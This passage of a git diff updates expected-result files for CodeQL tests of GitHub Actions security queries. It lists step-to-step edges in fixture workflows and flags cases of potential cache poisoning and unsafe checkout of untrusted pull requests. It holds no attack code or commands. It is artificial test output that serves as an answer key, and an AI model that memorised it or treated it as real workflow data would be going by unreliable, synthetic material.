Uses Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | +| .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +#select +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 92d5a0b5ce1..29b311435dd 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,8 +1,265 @@ -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +edges +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | +| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | +| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| 